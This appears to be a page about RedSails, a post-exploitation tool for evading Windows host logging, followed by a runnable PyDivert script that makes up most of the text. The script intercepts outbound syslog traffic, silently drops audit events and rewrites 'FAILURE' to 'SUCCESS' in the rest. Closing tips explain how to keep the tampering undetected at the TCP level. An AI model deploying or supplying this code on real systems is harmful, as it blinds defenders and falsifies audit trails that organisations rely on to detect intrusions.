RedSails – Bypassing host-based security monitoring and logging

A post-exploitation tool that maintains persistence on a compromised machine, subverts many common host event logs (both network and account-logon events) and generates false logs / network traffic. Based on [PyDivert](https://github.com/ffalcinelli/pydivert), a Python binding for WinDivert, a Windows driver that lets user-mode applications capture, modify or drop network packets as they pass through the Windows network stack. Built […]
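The capture/modify/drop loop that PyDivert exposes is the mechanism the description above rests on, so the following is an added illustration of that loop. It is not RedSails' code (the project's own filters and logic are not shown on this page): the collector address and port, the drop markers and the rewrite table are assumptions chosen for the example. `decide()` and `process()` are pure Python and run anywhere; `run_windivert()` is the real thing and needs Windows, the WinDivert driver and an elevated prompt.

```python
# Added example of a PyDivert (WinDivert) capture / modify / drop loop.
# Not RedSails' code. COLLECTOR_*, DROP_MARKERS and REWRITE are assumptions.
from dataclasses import dataclass

# Assumed: a remote syslog collector this host forwards events to.
COLLECTOR_ADDR = "10.0.0.5"
COLLECTOR_PORT = 514

# WinDivert filter language. Only packets matching the filter are diverted to
# user mode; everything else stays on the normal kernel path untouched.
WINDIVERT_FILTER = (
    f"outbound and tcp and ip.DstAddr == {COLLECTOR_ADDR} "
    f"and tcp.DstPort == {COLLECTOR_PORT}"
)

# Assumed rules for the demo. A segment whose payload contains a drop marker is
# never re-injected; otherwise the rewrite table is applied byte-for-byte.
DROP_MARKERS = (b"audit",)
REWRITE = {b"FAILURE": b"SUCCESS"}   # same length: TCP sequence numbers stay valid


@dataclass
class PacketView:
    """The subset of pydivert.Packet attributes used below (same names)."""
    is_outbound: bool
    dst_addr: str
    dst_port: int
    payload: bytes


def decide(pkt):
    """Classify one diverted packet. Returns (action, payload_to_send)."""
    # Re-check what the filter should already guarantee: a handle opened with a
    # broader filter must never disturb unrelated traffic.
    if not (pkt.is_outbound and pkt.dst_addr == COLLECTOR_ADDR
            and pkt.dst_port == COLLECTOR_PORT):
        return "pass", pkt.payload
    if not pkt.payload:                      # handshake / pure ACK: keep session alive
        return "pass", pkt.payload
    if any(marker in pkt.payload for marker in DROP_MARKERS):
        return "drop", b""
    new = pkt.payload
    for old, repl in REWRITE.items():
        assert len(old) == len(repl), "rewrites must preserve segment length"
        new = new.replace(old, repl)
    if new != pkt.payload:
        return "rewrite", new
    return "pass", pkt.payload


def process(packets, send):
    """Run decide() over an iterable of packets.

    `send` re-injects a packet into the stack (w.send in real use, which also
    recalculates checksums). Dropped packets are simply never handed back.
    Returns the list of (action, payload) decisions for inspection.
    """
    decisions = []
    for pkt in packets:
        action, payload = decide(pkt)
        if action == "rewrite":
            pkt.payload = payload            # pydivert.Packet.payload is settable
        if action != "drop":
            send(pkt)
        decisions.append((action, payload))
    return decisions


def run_windivert():
    """Real loop: Windows only, WinDivert driver installed, run as Administrator."""
    import pydivert   # imported here so decide()/process() import cleanly elsewhere
    with pydivert.WinDivert(WINDIVERT_FILTER) as w:
        process(w, w.send)


if __name__ == "__main__":
    run_windivert()
```

Two caveats a practitioner will hit immediately. Dropping an outbound TCP segment does not make it disappear: the local stack sees no ACK and retransmits, so the drop has to be applied consistently for the life of the connection (or the connection refused up front). And a rewrite that changes the payload length desynchronises the sequence numbers of every later segment, which is why the table above only substitutes equal-length byte strings.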